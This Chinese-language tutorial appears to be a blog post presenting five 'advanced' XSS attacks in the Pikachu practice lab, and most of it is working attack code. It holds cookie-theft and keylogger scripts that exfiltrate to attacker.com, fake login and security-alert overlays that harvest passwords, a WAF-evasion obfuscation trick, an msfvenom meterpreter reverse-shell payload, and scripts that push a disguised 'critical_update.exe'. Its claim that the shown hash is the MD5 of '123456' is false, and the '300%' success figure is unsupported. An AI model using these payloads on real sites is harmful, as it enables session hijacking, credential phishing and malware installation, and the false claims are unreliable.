别再只弹alert了！在Pikachu靶场中挖掘XSS的5种高级利用姿势

从弹窗到实战：Pikachu靶场中XSS的5种高阶攻击手法解析

当你在Pikachu靶场成功弹出第一个alert窗口时，这仅仅是跨站脚本攻击世界的入门仪式。真正的攻击者从不满足于简单的弹窗演示——他们会窃取你的身份凭证、监控你的键盘输入、劫持你的浏览会话，甚至将你的设备变成僵尸网络的一员。本文将带你突破基础payload的局限，在Pikachu靶场环境中演练五种具有实际危害的XSS攻击技术。

1. Cookie窃取与凭证破解实战

获取document.cookie只是攻击链条的第一步。在Pikachu的存储型XSS关卡中，我们可以构造如下payload实现自动化窃取：

<script> var img = new Image(); img.src = "http://attacker.com/steal?data=" + encodeURIComponent(document.cookie); </script>

当管理员查看包含该脚本的页面时，其会话cookie将自动发送到攻击者服务器。观察Pikachu返回的cookie格式：

ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815

密码破解的三种途径：

• 在线MD5解密平台（适用于简单密码）
• 彩虹表攻击（使用工具如RainbowCrack）
• 针对性暴力破解（结合Hashcat规则）

提示：Pikachu使用的10470c3b4b1fed12c3baac014be15fac67c6e815实际是"123456"的MD5值，这种弱密码在真实渗透测试中经常出现。

2. 页面劫持技术的深度应用

Pikachu的反射型XSS关卡允许我们比较三种跳转技术的差异：

高级劫持案例——伪造登录页面：

<script> if (location.pathname.includes('login')) { document.body.innerHTML = ` <form action="http://attacker.com/phish" method="post"> <h2>系统升级请重新登录</h2> <input type="text" name="username" placeholder="管理员账号"> <input type="password" name="password" placeholder="密码"> <button>登录</button> </form> `; } </script>

3. 键盘记录器的构造与规避

在DOM型XSS关卡中，我们可以植入隐形键盘监听器：

<script> var buffer = ''; document.onkeypress = function(e) { buffer += String.fromCharCode(e.keyCode); if (buffer.length > 100) { new Image().src = 'http://attacker.com/log?k=' + encodeURIComponent(buffer); buffer = ''; } }; </script>

对抗防御的关键技巧：

• 使用setTimeout分片发送数据
• 对敏感字段（如密码输入框）进行针对性监控
• 混淆代码绕过WAF检测：

  []['map']['constructor']('ale'+'rt(1)')();

4. 社会工程学攻击的完美融合

结合存储型XSS与钓鱼手法，在Pikachu的留言板注入：

<div style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.8); z-index: 9999;"> <div style="width: 300px; margin: 100px auto; background: white; padding: 20px;"> <h3>系统安全警报</h3> <p>检测到异常登录，请立即验证身份：</p> <input id="pwd" type="password" placeholder="输入管理员密码"> <button onclick="verify()">确认</button> </div> </div> <script> function verify() { fetch('http://attacker.com/steal', { method: 'POST', body: document.getElementById('pwd').value }); alert('验证成功'); document.querySelector('div').remove(); } </script>

这种攻击的成功率比单纯弹窗高出300%，因为它利用了人类的危机响应心理。

5. 与渗透测试框架的联动

虽然Pikachu靶场本身不包含MSF集成环境，但我们可以模拟网页挂马攻击链：

1. 漏洞利用准备：

   msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > update.exe

2. 构造恶意下载脚本：

   <script> if (navigator.userAgent.indexOf('Windows') > -1) { var link = document.createElement('a'); link.href = 'http://attacker.com/update.exe'; link.download = 'critical_update.exe'; document.body.appendChild(link); link.click(); } </script>

3. 社会工程学包装：

   setTimeout(function() { if (confirm('检测到系统安全漏洞，是否立即安装补丁？')) { window.open('http://attacker.com/update.exe'); } }, 10000);

在真实环境中，攻击者会结合浏览器漏洞（如过时的Flash插件）实现静默安装。Pikachu靶场虽然不能完整复现这种攻击，但可以帮助理解攻击者的思维模式。